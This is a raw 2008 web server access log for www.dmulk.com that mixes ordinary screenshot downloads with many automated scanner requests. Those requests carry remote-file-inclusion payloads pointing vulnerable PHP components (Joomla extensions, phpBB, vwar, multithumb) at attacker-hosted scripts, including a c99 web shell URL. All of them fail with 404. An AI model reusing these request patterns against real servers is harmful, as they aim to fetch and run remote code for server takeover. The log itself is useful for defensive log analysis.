212.9.75.244 - - [31/Jan/2008:09:51:01 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.9.75.244 - - [31/Jan/2008:09:51:01 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.116.188.138 - - [31/Jan/2008:09:52:33 -0800] "GET /logs/access_071229.log/s.php?table=http://jabujabujabu.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.116.188.138 - - [31/Jan/2008:09:52:33 -0800] "GET /logs/s.php?table=http://jabujabujabu.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:09:54:50 -0800] "GET /logs/access_071230.log/phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:09:54:50 -0800] "GET /phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:09:54:51 -0800] "GET /logs/phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.243.54.131 - - [31/Jan/2008:09:55:21 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.243.54.131 - - [31/Jan/2008:09:55:22 -0800] "GET /logs/config.php?path_to_root=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.243.54.131 - - [31/Jan/2008:09:55:41 -0800] "GET /logs/access_080117.log/config.php?path_to_root=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.163.60.7 - - [31/Jan/2008:09:55:54 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.163.60.7 - - [31/Jan/2008:09:55:55 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.163.60.7 - - [31/Jan/2008:09:55:58 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.9.75.244 - - [31/Jan/2008:09:58:22 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.9.75.244 - - [31/Jan/2008:09:58:22 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.9.75.244 - - [31/Jan/2008:09:58:26 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.9.75.244 - - [31/Jan/2008:09:58:26 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.9.75.244 - - [31/Jan/2008:09:58:32 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.9.75.244 - - [31/Jan/2008:09:58:33 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.199.102.117 - - [31/Jan/2008:10:01:10 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.gvnr.xpg.com.br/id.txt?t? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [31/Jan/2008:10:01:10 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gvnr.xpg.com.br/id.txt?t? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [31/Jan/2008:10:01:10 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gvnr.xpg.com.br/id.txt?t? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:10:02:45 -0800] "GET /logs/access_080106.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:10:02:46 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:10:02:46 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [31/Jan/2008:10:03:31 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.163.60.7 - - [31/Jan/2008:10:04:02 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:05:22 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 200 913443 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:05:22 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 200 927196 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:05:23 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 200 842640 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:05:24 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 200 828304 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:05:25 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 200 812848 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
201.91.155.2 - - [31/Jan/2008:10:06:26 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.th1nk3r.kit.net/cmd/c99.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:06:49 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:06:49 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:06:49 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:06:49 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:06:49 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:06:57 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000165.jpg HTTP/1.1" 200 832088 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=164736" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
210.245.164.10 - - [31/Jan/2008:10:07:42 -0800] "GET /index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:46 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000214.jpg HTTP/1.1" 200 713890 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:46 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000046.jpg HTTP/1.1" 200 773445 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
212.9.75.244 - - [31/Jan/2008:10:07:47 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:47 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000270.jpg HTTP/1.1" 200 706210 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:47 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:48 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000207.jpg HTTP/1.1" 200 722685 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:48 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000246.jpg HTTP/1.1" 200 746597 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:49 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000004.jpg HTTP/1.1" 200 559417 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:49 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000136.jpg HTTP/1.1" 200 737141 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:50 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
212.9.75.244 - - [31/Jan/2008:10:07:51 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:51 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000251.jpg HTTP/1.1" 200 762875 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:52 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000225.jpg HTTP/1.1" 200 758217 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:52 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000188.jpg HTTP/1.1" 200 836334 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:52 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000185.jpg HTTP/1.1" 200 773497 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:53 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:53 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000013.jpg HTTP/1.1" 200 562674 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:53 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000229.jpg HTTP/1.1" 200 826013 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:54 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000021.jpg HTTP/1.1" 200 651918 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:54 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000253.jpg HTTP/1.1" 200 817672 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:55 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000187.jpg HTTP/1.1" 200 760935 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:55 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:55 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000193.jpg HTTP/1.1" 200 836136 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:56 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000233.jpg HTTP/1.1" 200 769073 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:56 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000264.jpg HTTP/1.1" 200 704661 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:56 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000094.jpg HTTP/1.1" 200 660073 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:56 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000022.jpg HTTP/1.1" 200 507829 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:57 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:57 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000241.jpg HTTP/1.1" 200 766274 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:57 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000224.jpg HTTP/1.1" 200 774954 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:58 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000139.jpg HTTP/1.1" 200 674897 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:58 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000025.jpg HTTP/1.1" 200 776473 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
128.49.164.56 - - [31/Jan/2008:10:07:59 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000170.jpg HTTP/1.1" 200 766667 "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
212.9.75.244 - - [31/Jan/2008:10:08:14 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.204.79 - - [31/Jan/2008:10:08:35 -0800] "GET /logs/access_071230.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.79 - - [31/Jan/2008:10:08:35 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.79 - - [31/Jan/2008:10:08:35 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.177.16.61 - - [31/Jan/2008:10:09:04 -0800] "GET /index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.204.79 - - [31/Jan/2008:10:09:18 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.35.191.105 - - [31/Jan/2008:10:10:16 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
140.128.57.1 - - [31/Jan/2008:10:11:43 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.139.219.235 - - [31/Jan/2008:10:13:19 -0800] "GET /logs/access_071231.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.139.219.235 - - [31/Jan/2008:10:13:19 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.139.219.235 - - [31/Jan/2008:10:13:19 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.183.154 - - [31/Jan/2008:10:14:32 -0800] "GET /logs/access_071231.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.183.154 - - [31/Jan/2008:10:14:32 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.183.154 - - [31/Jan/2008:10:14:33 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.209.168 - - [31/Jan/2008:10:15:35 -0800] "GET /logs/access_071231.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.209.168 - - [31/Jan/2008:10:15:36 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.209.168 - - [31/Jan/2008:10:15:36 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.77.45 - - [31/Jan/2008:10:15:37 -0800] "GET /logs/access_071231.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.77.45 - - [31/Jan/2008:10:15:37 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.77.45 - - [31/Jan/2008:10:15:38 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.29.114 - - [31/Jan/2008:10:15:45 -0800] "GET /logs/access_071231.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.29.114 - - [31/Jan/2008:10:15:45 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.29.114 - - [31/Jan/2008:10:15:45 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
